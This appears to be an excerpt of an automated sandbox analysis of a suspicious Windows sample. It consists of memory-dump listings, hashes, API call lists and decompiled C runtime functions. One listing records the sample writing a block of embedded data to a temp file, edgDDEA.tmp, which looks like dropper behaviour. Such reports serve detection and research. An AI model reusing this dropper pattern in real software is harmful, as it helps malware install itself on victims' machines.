    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
    • String ID: csm$csm
    • API String ID: 1170836740-3733052814
    • Opcode ID: 4be62918fffcc03d789097040e74f25d6d5777a5ed78f3465869a8eb41b6c3e7
    • Instruction ID: 4cb769d8553c85f432794e76f97707043a613b1fe59b45871c451135b29a340e
    • Opcode Fuzzy Hash: 4be62918fffcc03d789097040e74f25d6d5777a5ed78f3465869a8eb41b6c3e7
    • Instruction Fuzzy Hash: 48517D34A04389DFCF11CF68C848A7E7BB5AF45328F1589D9E9155B352D731D901CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID:
    • String ID: api-ms-$ext-ms-
    • API String ID: 0-537541572
    • Opcode ID: 5c6350fc6b30338cae45998d7f041e5c3a9930011e9560f83503dae8af00d0d9
    • Instruction ID: 6baafbb6c3c4b844cb55a8238a0ed847383e09eacb4ad374cae33200e4f0af31
    • Opcode Fuzzy Hash: 5c6350fc6b30338cae45998d7f041e5c3a9930011e9560f83503dae8af00d0d9
    • Instruction Fuzzy Hash: 60212775B43224ABDB72DA259D44B3F77AC9F036A1F190520EC97AB290EB30DD00C6E0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D86994C(void* __ecx, signed int* _a4, intOrPtr _a8) {
    				signed int* _v8;
    				void** _t12;
    				void* _t16;
    				void* _t18;
    				signed int _t22;
    				WCHAR* _t23;
    				void** _t26;
    				signed int* _t29;
    				void* _t32;
    				void* _t34;
    
    				_t29 = _a4;
    				while(_t29 != _a8) {
    					_t22 =  *_t29;
    					_t12 = 0x6d8c1738 + _t22 * 4;
    					_t32 =  *_t12;
    					_v8 = _t12;
    					if(_t32 == 0) {
    						_t23 =  *(0x6d8711f8 + _t22 * 4);
    						_t32 = LoadLibraryExW(_t23, 0, 0x800);
    						if(_t32 != 0) {
    							L12:
    							_t26 = _v8;
    							 *_t26 = _t32;
    							if( *_t26 != 0) {
    								FreeLibrary(_t32);
    							}
    							L14:
    							if(_t32 != 0) {
    								_t16 = _t32;
    								L18:
    								return _t16;
    							}
    							L15:
    							_t29 =  &(_t29[1]);
    							continue;
    						}
    						_t18 = GetLastError();
    						if(_t18 != 0x57) {
    							L9:
    							_t32 = 0;
    							L10:
    							if(_t32 != 0) {
    								goto L12;
    							}
    							 *_v8 = _t18 | 0xffffffff;
    							goto L15;
    						}
    						_t18 = E6D867C88(_t23, L"api-ms-", 7);
    						_t34 = _t34 + 0xc;
    						if(_t18 == 0) {
    							goto L9;
    						}
    						_t18 = E6D867C88(_t23, L"ext-ms-", 7);
    						_t34 = _t34 + 0xc;
    						if(_t18 == 0) {
    							goto L9;
    						}
    						_t18 = LoadLibraryExW(_t23, _t32, _t32);
    						_t32 = _t18;
    						goto L10;
    					}
    					if(_t32 == 0xffffffff) {
    						goto L15;
    					}
    					goto L14;
    				}
    				_t16 = 0;
    				goto L18;
    			}













    0x6d869955
    0x6d8699ff
    0x6d86995d
    0x6d86995f
    0x6d869966
    0x6d869968
    0x6d86996e
    0x6d86997b
    0x6d869990
    0x6d869994
    0x6d8699e6
    0x6d8699e6
    0x6d8699eb
    0x6d8699ef
    0x6d8699f2
    0x6d8699f2
    0x6d8699f8
    0x6d8699fa
    0x6d869a0f
    0x6d869a0a
    0x6d869a0e
    0x6d869a0e
    0x6d8699fc
    0x6d8699fc
    0x00000000
    0x6d8699fc
    0x6d869996
    0x6d86999f
    0x6d8699d6
    0x6d8699d6
    0x6d8699d8
    0x6d8699da
    0x00000000
    0x00000000
    0x6d8699e2
    0x00000000
    0x6d8699e2
    0x6d8699a9
    0x6d8699ae
    0x6d8699b3
    0x00000000
    0x00000000
    0x6d8699bd
    0x6d8699c2
    0x6d8699c7
    0x00000000
    0x00000000
    0x6d8699cc
    0x6d8699d2
    0x00000000
    0x6d8699d2
    0x6d869973
    0x00000000
    0x00000000
    0x00000000
    0x6d869979
    0x6d869a08
    0x00000000

    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: api-ms-$ext-ms-
    • API String ID: 0-537541572
    • Opcode ID: c940b7fa3d3a29b22614cc826e3451cb9d2198e90f941b465358c002440c3391
    • Instruction ID: ba1c5277f61b55e51ff8f353d5b1d0afc692e2236a372983368950bb6d102bd8
    • Opcode Fuzzy Hash: c940b7fa3d3a29b22614cc826e3451cb9d2198e90f941b465358c002440c3391
    • Instruction Fuzzy Hash: 3B21C972A056A5ABDB116B2A8C8CB7E76786B077B4F114A11F915A72C9D730D900C5F0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: 4020c6471791a799dba88b857dc9e25aa379d10d3b2acc77d9841091bede0fd0
    • Instruction ID: ab07e6002a58525ef57c473b47f0237abc9a7c75ebd6a27898945b523a4f925a
    • Opcode Fuzzy Hash: 4020c6471791a799dba88b857dc9e25aa379d10d3b2acc77d9841091bede0fd0
    • Instruction Fuzzy Hash: 3711B175A0BB44EBD630FBB0CC05FCB77DD6F80308F444814A299AE198DB75B48486C0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: 77548614c448977e3f0dc8040cb94d355d909ba76b153c7c383a0f1432c05188
    • Instruction ID: 87351b427ce6a08ee842e7406bd5db39d7446d691db6a4fd0d699e97fdc74cf2
    • Opcode Fuzzy Hash: 77548614c448977e3f0dc8040cb94d355d909ba76b153c7c383a0f1432c05188
    • Instruction Fuzzy Hash: 93116379542B08BAD921FBB1CC06FCB779D6F85721F800819BA9B6E090DA75F6084750
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 0303BC6B: _free.LIBCMT ref: 0303BC90
    • _free.LIBCMT ref: 0303BCF1
      • Part of subcall function 03037F3F: HeapFree.KERNEL32(00000000,00000000,?,0303727A), ref: 03037F55
      • Part of subcall function 03037F3F: GetLastError.KERNEL32(?,?,0303727A), ref: 03037F67
    • _free.LIBCMT ref: 0303BCFC
    • _free.LIBCMT ref: 0303BD07
    • _free.LIBCMT ref: 0303BD5B
    • _free.LIBCMT ref: 0303BD66
    • _free.LIBCMT ref: 0303BD71
    • _free.LIBCMT ref: 0303BD7C
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: acd949e2a0a43d2e5cf92accafdd33b3a4568e9dd05bb30a302921c11883146f
    • Instruction ID: 2eccb0ec4caf196f698d118670e1e82f7eb81cd4291de9e8a0d29d1fc15da6dc
    • Opcode Fuzzy Hash: acd949e2a0a43d2e5cf92accafdd33b3a4568e9dd05bb30a302921c11883146f
    • Instruction Fuzzy Hash: CE115179552B04EAE530F7B0CC46FDB77DC6F8A704F840815B2A9AF1A0DA75B5044694
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D86CA10(intOrPtr _a4) {
    				void* _t18;
    
    				_t45 = _a4;
    				if(_a4 != 0) {
    					E6D86C9D8(_t45, 7);
    					E6D86C9D8(_t45 + 0x1c, 7);
    					E6D86C9D8(_t45 + 0x38, 0xc);
    					E6D86C9D8(_t45 + 0x68, 0xc);
    					E6D86C9D8(_t45 + 0x98, 2);
    					E6D867CC2( *((intOrPtr*)(_t45 + 0xa0)));
    					E6D867CC2( *((intOrPtr*)(_t45 + 0xa4)));
    					E6D867CC2( *((intOrPtr*)(_t45 + 0xa8)));
    					E6D86C9D8(_t45 + 0xb4, 7);
    					E6D86C9D8(_t45 + 0xd0, 7);
    					E6D86C9D8(_t45 + 0xec, 0xc);
    					E6D86C9D8(_t45 + 0x11c, 0xc);
    					E6D86C9D8(_t45 + 0x14c, 2);
    					E6D867CC2( *((intOrPtr*)(_t45 + 0x154)));
    					E6D867CC2( *((intOrPtr*)(_t45 + 0x158)));
    					E6D867CC2( *((intOrPtr*)(_t45 + 0x15c)));
    					return E6D867CC2( *((intOrPtr*)(_t45 + 0x160)));
    				}
    				return _t18;
    			}




    0x6d86ca16
    0x6d86ca1b
    0x6d86ca24
    0x6d86ca2f
    0x6d86ca3a
    0x6d86ca45
    0x6d86ca53
    0x6d86ca5e
    0x6d86ca69
    0x6d86ca74
    0x6d86ca82
    0x6d86ca90
    0x6d86caa1
    0x6d86caaf
    0x6d86cabd
    0x6d86cac8
    0x6d86cad3
    0x6d86cade
    0x00000000
    0x6d86caee
    0x6d86caf3

    APIs
      • Part of subcall function 6D86C9D8: _free.LIBCMT ref: 6D86C9FD
    • _free.LIBCMT ref: 6D86CA5E
      • Part of subcall function 6D867CC2: HeapFree.KERNEL32(00000000,00000000,?,6D86CA02,?,00000000,?,00000000,?,6D86CA29,?,00000007,?,?,6D86ABCC,?), ref: 6D867CD8
      • Part of subcall function 6D867CC2: GetLastError.KERNEL32(?,?,6D86CA02,?,00000000,?,00000000,?,6D86CA29,?,00000007,?,?,6D86ABCC,?,?), ref: 6D867CEA
    • _free.LIBCMT ref: 6D86CA69
    • _free.LIBCMT ref: 6D86CA74
    • _free.LIBCMT ref: 6D86CAC8
    • _free.LIBCMT ref: 6D86CAD3
    • _free.LIBCMT ref: 6D86CADE
    • _free.LIBCMT ref: 6D86CAE9
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 0bb9ebdd5050065bbde736e0c122234aa590cc1f5c44d25b86159968600ef490
    • Instruction ID: e7ad08f0ff7a377f9113eed3002fdc8473325497d13117c610d60819264d736f
    • Opcode Fuzzy Hash: 0bb9ebdd5050065bbde736e0c122234aa590cc1f5c44d25b86159968600ef490
    • Instruction Fuzzy Hash: 51119D71A88B84BADB20EBB4CC09FDB7B9C6F00324F415C16A399B6157CF24B40147A0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CreateFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\edgDDEA.tmp,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 03031621
    • GetLastError.KERNEL32 ref: 03031631
    • WriteFile.KERNEL32(00000000,0304CDA0,00014C00,?,00000000), ref: 0303164B
    • GetLastError.KERNEL32 ref: 03031655
    • CloseHandle.KERNEL32(00000000), ref: 0303165E
    Strings
    • C:\Users\user\AppData\Local\Temp\edgDDEA.tmp, xrefs: 0303161C
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: ErrorFileLast$CloseCreateHandleWrite
    • String ID: C:\Users\user\AppData\Local\Temp\edgDDEA.tmp
    • API String ID: 4031202350-980432519
    • Opcode ID: b9bdd22968e2ab02684740b0383526993cdc12d81787e6cc87890f2929f5d831
    • Instruction ID: 6ba20ad8bc874d56e8f0c95fa25b2d873f3300a413a13e13d0578be2f49ce7c0
    • Opcode Fuzzy Hash: b9bdd22968e2ab02684740b0383526993cdc12d81787e6cc87890f2929f5d831
    • Instruction Fuzzy Hash: D6F0B4B6243220BBD720A6B6AE0EFAF79ACDB46AB4F050210F905E3181D7705A0086A1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 66%
    			E6D86BB23(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, signed int _a8, long _a12, intOrPtr _a16) {
    				signed int _v8;
    				char _v16;
    				char _v23;
    				char _v24;
    				void _v32;
    				signed int _v33;
    				long _v40;
    				long _v44;
    				char _v47;
    				void _v48;
    				intOrPtr _v52;
    				long _v56;
    				char _v60;
    				intOrPtr _v68;
    				char _v72;
    				struct _OVERLAPPED* _v76;
    				signed int _v80;
    				signed int _v84;
    				intOrPtr _v88;
    				signed int _v92;
    				long _v96;
    				long _v100;
    				intOrPtr _v104;
    				intOrPtr _v108;
    				long _v112;
    				void* _v116;
    				char _v120;
    				int _v124;
    				intOrPtr _v128;
    				struct _OVERLAPPED* _v132;
    				struct _OVERLAPPED* _v136;
    				struct _OVERLAPPED* _v140;
    				struct _OVERLAPPED* _v144;
    				void* __ebp;
    				signed int _t172;
    				signed int _t174;
    				int _t178;
    				intOrPtr _t183;
    				intOrPtr _t186;
    				void* _t188;
    				void* _t190;
    				long _t193;
    				void _t198;
    				long _t202;
    				void* _t206;
    				intOrPtr _t212;
    				signed char* _t213;
    				char _t216;
    				signed int _t219;
    				char* _t220;
    				void* _t222;
    				long _t228;
    				intOrPtr _t229;
    				char _t231;
    				long _t235;
    				struct _OVERLAPPED* _t243;
    				signed int _t246;
    				intOrPtr _t249;
    				signed int _t252;
    				signed int _t253;
    				signed int _t255;
    				struct _OVERLAPPED* _t256;
    				intOrPtr _t258;
    				void* _t262;
    				long _t263;
    				signed char _t264;
    				signed int _t265;
    				void* _t266;
    				void* _t268;
    				struct _OVERLAPPED* _t269;
    				long _t270;
    				signed int _t271;
    				long _t275;
    				signed int _t278;
    				long _t279;
    				struct _OVERLAPPED* _t280;
    				signed int _t282;
    				intOrPtr _t284;
    				signed int _t286;
    				signed int _t289;
    				long _t290;
    				long _t291;
    				signed int _t292;
    				intOrPtr _t293;
    				signed int _t294;
    				void* _t295;
    				void* _t296;
    
    				_t172 =  *0x6d877014; // 0x6a907f72
    				_v8 = _t172 ^ _t294;
    				_t174 = _a8;
    				_t263 = _a12;
    				_t282 = (_t174 & 0x0000003f) * 0x38;
    				_t246 = _t174 >> 6;
    				_v112 = _t263;
    				_v84 = _t246;
    				_v80 = _t282;
    				_t284 = _a16 + _t263;
    				_v116 =  *((intOrPtr*)(_t282 +  *((intOrPtr*)(0x6d8c1818 + _t246 * 4)) + 0x18));
    				_v104 = _t284;
    				_t178 = GetConsoleCP();
    				_t243 = 0;
    				_v124 = _t178;
    				E6D867B60( &_v72, _t263, 0);
    				asm("stosd");
    				_t249 =  *((intOrPtr*)(_v68 + 8));
    				_v128 = _t249;
    				asm("stosd");
    				asm("stosd");
    				_t275 = _v112;
    				_v40 = _t275;
    				if(_t275 >= _t284) {
    					L52:
    					__eflags = _v60 - _t243;
    				} else {
    					_t286 = _v92;
    					while(1) {
    						_v47 =  *_t275;
    						_v76 = _t243;
    						_v44 = 1;
    						_t186 =  *((intOrPtr*)(0x6d8c1818 + _v84 * 4));
    						_v52 = _t186;
    						if(_t249 != 0xfde9) {
    							goto L23;
    						}
    						_t265 = _v80;
    						_t212 = _t186 + 0x2e + _t265;
    						_t256 = _t243;
    						_v108 = _t212;
    						while( *((intOrPtr*)(_t212 + _t256)) != _t243) {
    							_t256 =  &(_t256->Internal);
    							if(_t256 < 5) {
    								continue;
    							}
    							break;
    						}
    						_t213 = _v40;
    						_t278 = _v104 - _t213;
    						_v44 = _t256;
    						if(_t256 <= 0) {
    							_t258 =  *((char*)(( *_t213 & 0x000000ff) + 0x6d877760)) + 1;
    							_v52 = _t258;
    							__eflags = _t258 - _t278;
    							if(_t258 > _t278) {
    								__eflags = _t278;
    								if(_t278 <= 0) {
    									goto L44;
    								} else {
    									_t290 = _v40;
    									do {
    										_t266 = _t265 + _t243;
    										_t216 =  *((intOrPtr*)(_t243 + _t290));
    										_t243 =  &(_t243->Internal);
    										 *((char*)(_t266 +  *((intOrPtr*)(0x6d8c1818 + _v84 * 4)) + 0x2e)) = _t216;
    										_t265 = _v80;
    										__eflags = _t243 - _t278;
    									} while (_t243 < _t278);
    									goto L43;
    								}
    							} else {
    								_t279 = _v40;
    								__eflags = _t258 - 4;
    								_v144 = _t243;
    								_t260 =  &_v144;
    								_v140 = _t243;
    								_v56 = _t279;
    								_t219 = (0 | _t258 == 0x00000004) + 1;
    								__eflags = _t219;
    								_push( &_v144);
    								_v44 = _t219;
    								_push(_t219);
    								_t220 =  &_v56;
    								goto L21;
    							}
    						} else {
    							_t228 =  *((char*)(( *(_t265 + _v52 + 0x2e) & 0x000000ff) + 0x6d877760)) + 1;
    							_v56 = _t228;
    							_t229 = _t228 - _t256;
    							_v52 = _t229;
    							if(_t229 > _t278) {
    								__eflags = _t278;
    								if(_t278 > 0) {
    									_t291 = _v40;
    									do {
    										_t268 = _t265 + _t243 + _t256;
    										_t231 =  *((intOrPtr*)(_t243 + _t291));
    										_t243 =  &(_t243->Internal);
    										 *((char*)(_t268 +  *((intOrPtr*)(0x6d8c1818 + _v84 * 4)) + 0x2e)) = _t231;
    										_t256 = _v44;
    										_t265 = _v80;
    										__eflags = _t243 - _t278;
    									} while (_t243 < _t278);
    									L43:
    									_t286 = _v92;
    								}
    								L44:
    								_t289 = _t286 + _t278;
    								__eflags = _t289;
    								L45:
    								__eflags = _v60;
    								_v92 = _t289;
    							} else {
    								_t269 = _t243;
    								if(_t256 > 0) {
    									_t293 = _v108;
    									do {
    										 *((char*)(_t294 + _t269 - 0xc)) =  *((intOrPtr*)(_t293 + _t269));
    										_t269 =  &(_t269->Internal);
    									} while (_t269 < _t256);
    									_t229 = _v52;
    								}
    								_t279 = _v40;
    								if(_t229 > 0) {
    									E6D8659E0( &_v16 + _t256, _t279, _v52);
    									_t256 = _v44;
    									_t295 = _t295 + 0xc;
    								}
    								if(_t256 > 0) {
    									_t270 = _v44;
    									_t280 = _t243;
    									_t292 = _v80;
    									do {
    										_t262 = _t292 + _t280;
    										_t280 =  &(_t280->Internal);
    										 *(_t262 +  *((intOrPtr*)(0x6d8c1818 + _v84 * 4)) + 0x2e) = _t243;
    									} while (_t280 < _t270);
    									_t279 = _v40;
    								}
    								_v136 = _t243;
    								_v120 =  &_v16;
    								_t260 =  &_v136;
    								_v132 = _t243;
    								_push( &_v136);
    								_t235 = (0 | _v56 == 0x00000004) + 1;
    								_v44 = _t235;
    								_push(_t235);
    								_t220 =  &_v120;
    								L21:
    								_push(_t220);
    								_push( &_v76);
    								_t222 = E6D86C757(_t260);
    								_t296 = _t295 + 0x10;
    								if(_t222 == 0xffffffff) {
    									goto L52;
    								} else {
    									_t275 = _t279 + _v52 - 1;
    									L31:
    									_t275 = _t275 + 1;
    									_v40 = _t275;
    									_t193 = E6D869796(_v124, _t243,  &_v76, _v44,  &_v32, 5, _t243, _t243);
    									_t295 = _t296 + 0x20;
    									_v56 = _t193;
    									if(_t193 == 0) {
    										goto L52;
    									} else {
    										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t243) == 0) {
    											L51:
    											_v96 = GetLastError();
    											goto L52;
    										} else {
    											_t286 = _v88 - _v112 + _t275;
    											_v92 = _t286;
    											if(_v100 < _v56) {
    												goto L52;
    											} else {
    												if(_v47 != 0xa) {
    													L38:
    													if(_t275 >= _v104) {
    														goto L52;
    													} else {
    														_t249 = _v128;
    														continue;
    													}
    												} else {
    													_t198 = 0xd;
    													_v48 = _t198;
    													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t243) == 0) {
    														goto L51;
    													} else {
    														if(_v100 < 1) {
    															goto L52;
    														} else {
    															_v88 = _v88 + 1;
    															_t286 = _t286 + 1;
    															_v92 = _t286;
    															goto L38;
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    						goto L53;
    						L23:
    						_t252 = _v80;
    						_t264 =  *((intOrPtr*)(_t252 + _t186 + 0x2d));
    						__eflags = _t264 & 0x00000004;
    						if((_t264 & 0x00000004) == 0) {
    							_v33 =  *_t275;
    							_t188 = E6D86A994(_t264);
    							_t253 = _v33 & 0x000000ff;
    							__eflags =  *((intOrPtr*)(_t188 + _t253 * 2)) - _t243;
    							if( *((intOrPtr*)(_t188 + _t253 * 2)) >= _t243) {
    								_push(1);
    								_push(_t275);
    								goto L30;
    							} else {
    								_t202 = _t275 + 1;
    								_v56 = _t202;
    								__eflags = _t202 - _v104;
    								if(_t202 >= _v104) {
    									_t271 = _v84;
    									_t255 = _v80;
    									 *((char*)(_t255 +  *((intOrPtr*)(0x6d8c1818 + _t271 * 4)) + 0x2e)) = _v33;
    									 *(_t255 +  *((intOrPtr*)(0x6d8c1818 + _t271 * 4)) + 0x2d) =  *(_t255 +  *((intOrPtr*)(0x6d8c1818 + _t271 * 4)) + 0x2d) | 0x00000004;
    									_t289 = _t286 + 1;
    									goto L45;
    								} else {
    									_t206 = E6D86A859( &_v76, _t275, 2);
    									_t296 = _t295 + 0xc;
    									__eflags = _t206 - 0xffffffff;
    									if(_t206 == 0xffffffff) {
    										goto L52;
    									} else {
    										_t275 = _v56;
    										goto L31;
    									}
    								}
    							}
    						} else {
    							_v24 =  *((intOrPtr*)(_t252 + _t186 + 0x2e));
    							_v23 =  *_t275;
    							_push(2);
    							 *(_t252 + _v52 + 0x2d) = _t264 & 0x000000fb;
    							_push( &_v24);
    							L30:
    							_push( &_v76);
    							_t190 = E6D86A859();
    							_t296 = _t295 + 0xc;
    							__eflags = _t190 - 0xffffffff;
    							if(_t190 == 0xffffffff) {
    								goto L52;
    							} else {
    								goto L31;
    							}
    						}
    						goto L53;
    					}
    				}
    				L53:
    				if(__eflags != 0) {
    					_t183 = _v72;
    					_t167 = _t183 + 0x350;
    					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
    					__eflags =  *_t167;
    				}
    				__eflags = _v8 ^ _t294;
    				asm("movsd");
    				asm("movsd");
    				asm("movsd");
    				return E6D864095(_v8 ^ _t294);
    			}


























































































    0x6d86bb2e
    0x6d86bb35
    0x6d86bb38
    0x6d86bb3d
    0x6d86bb45
    0x6d86bb48
    0x6d86bb4c
    0x6d86bb4f
    0x6d86bb59
    0x6d86bb63
    0x6d86bb65
    0x6d86bb68
    0x6d86bb6b
    0x6d86bb71
    0x6d86bb73
    0x6d86bb7a
    0x6d86bb87
    0x6d86bb88
    0x6d86bb8b
    0x6d86bb8e
    0x6d86bb8f
    0x6d86bb90
    0x6d86bb93
    0x6d86bb98
    0x6d86bea4
    0x6d86bea4
    0x6d86bb9e
    0x6d86bb9e
    0x6d86bba1
    0x6d86bba3
    0x6d86bba9
    0x6d86bbac
    0x6d86bbb3
    0x6d86bbba
    0x6d86bbc3
    0x00000000
    0x00000000
    0x6d86bbc9
    0x6d86bbcf
    0x6d86bbd1
    0x6d86bbd3
    0x6d86bbd6
    0x6d86bbdb
    0x6d86bbdf
    0x00000000
    0x00000000
    0x00000000
    0x6d86bbdf
    0x6d86bbe4
    0x6d86bbe7
    0x6d86bbe9
    0x6d86bbee
    0x6d86bca0
    0x6d86bca1
    0x6d86bca4
    0x6d86bca6
    0x6d86be54
    0x6d86be56
    0x00000000
    0x6d86be58
    0x6d86be58
    0x6d86be5b
    0x6d86be5e
    0x6d86be67
    0x6d86be6a
    0x6d86be6b
    0x6d86be6f
    0x6d86be72
    0x6d86be72
    0x00000000
    0x6d86be76
    0x6d86bcac
    0x6d86bcac
    0x6d86bcb1
    0x6d86bcb4
    0x6d86bcba
    0x6d86bcc0
    0x6d86bcc9
    0x6d86bccc
    0x6d86bccc
    0x6d86bccd
    0x6d86bcce
    0x6d86bcd1
    0x6d86bcd2
    0x00000000
    0x6d86bcd2
    0x6d86bbf4
    0x6d86bc03
    0x6d86bc04
    0x6d86bc07
    0x6d86bc09
    0x6d86bc0e
    0x6d86be1f
    0x6d86be21
    0x6d86be23
    0x6d86be26
    0x6d86be2b
    0x6d86be34
    0x6d86be37
    0x6d86be38
    0x6d86be3c
    0x6d86be3f
    0x6d86be42
    0x6d86be42
    0x6d86be46
    0x6d86be46
    0x6d86be46
    0x6d86be49
    0x6d86be49
    0x6d86be49
    0x6d86be4b
    0x6d86be4b
    0x6d86be4f
    0x6d86bc14
    0x6d86bc14
    0x6d86bc18
    0x6d86bc1a
    0x6d86bc1d
    0x6d86bc20
    0x6d86bc24
    0x6d86bc25
    0x6d86bc29
    0x6d86bc29
    0x6d86bc2c
    0x6d86bc31
    0x6d86bc3d
    0x6d86bc42
    0x6d86bc45
    0x6d86bc45
    0x6d86bc4a
    0x6d86bc4c
    0x6d86bc4f
    0x6d86bc51
    0x6d86bc54
    0x6d86bc57
    0x6d86bc5a
    0x6d86bc62
    0x6d86bc66
    0x6d86bc6a
    0x6d86bc6a
    0x6d86bc70
    0x6d86bc76
    0x6d86bc79
    0x6d86bc81
    0x6d86bc88
    0x6d86bc8c
    0x6d86bc8d
    0x6d86bc90
    0x6d86bc91
    0x6d86bcd5
    0x6d86bcd5
    0x6d86bcd9
    0x6d86bcda
    0x6d86bcdf
    0x6d86bce5
    0x00000000
    0x6d86bceb
    0x6d86bcef
    0x6d86bd78
    0x6d86bd7f
    0x6d86bd87
    0x6d86bd8f
    0x6d86bd94
    0x6d86bd97
    0x6d86bd9c
    0x00000000
    0x6d86bda2
    0x6d86bdb7
    0x6d86be9b
    0x6d86bea1
    0x00000000
    0x6d86bdbd
    0x6d86bdc6
    0x6d86bdc8
    0x6d86bdce
    0x00000000
    0x6d86bdd4
    0x6d86bdd8
    0x6d86be0e
    0x6d86be11
    0x00000000
    0x6d86be17
    0x6d86be17
    0x00000000
    0x6d86be17
    0x6d86bdda
    0x6d86bddc
    0x6d86bdde
    0x6d86bdf7
    0x00000000
    0x6d86bdfd
    0x6d86be01
    0x00000000
    0x6d86be07
    0x6d86be07
    0x6d86be0a
    0x6d86be0b
    0x00000000
    0x6d86be0b
    0x6d86be01
    0x6d86bdf7
    0x6d86bdd8
    0x6d86bdce
    0x6d86bdb7
    0x6d86bd9c
    0x6d86bce5
    0x6d86bc0e
    0x00000000
    0x6d86bcf6
    0x6d86bcf6
    0x6d86bcf9
    0x6d86bcfd
    0x6d86bd00
    0x6d86bd22
    0x6d86bd25
    0x6d86bd2a
    0x6d86bd2e
    0x6d86bd32
    0x6d86bd60
    0x6d86bd62
    0x00000000
    0x6d86bd34
    0x6d86bd34
    0x6d86bd37
    0x6d86bd3a
    0x6d86bd3d
    0x6d86be78
    0x6d86be7b
    0x6d86be88
    0x6d86be93
    0x6d86be98
    0x00000000
    0x6d86bd43
    0x6d86bd4a
    0x6d86bd4f
    0x6d86bd52
    0x6d86bd55
    0x00000000
    0x6d86bd5b
    0x6d86bd5b
    0x00000000
    0x6d86bd5b
    0x6d86bd55
    0x6d86bd3d
    0x6d86bd02
    0x6d86bd09
    0x6d86bd0e
    0x6d86bd14
    0x6d86bd16
    0x6d86bd1d
    0x6d86bd63
    0x6d86bd66
    0x6d86bd67
    0x6d86bd6c
    0x6d86bd6f
    0x6d86bd72
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6d86bd72
    0x00000000
    0x6d86bd00
    0x6d86bba1
    0x6d86bea7
    0x6d86bea7
    0x6d86bea9
    0x6d86beac
    0x6d86beac
    0x6d86beac
    0x6d86beac
    0x6d86bebe
    0x6d86bec0
    0x6d86bec1
    0x6d86bec2
    0x6d86becc

    APIs
    • GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6D86BB6B
    • __fassign.LIBCMT ref: 6D86BD4A
    • __fassign.LIBCMT ref: 6D86BD67
    • WriteFile.KERNEL32(?,6D86A44E,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D86BDAF
    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D86BDEF
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D86BE9B
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
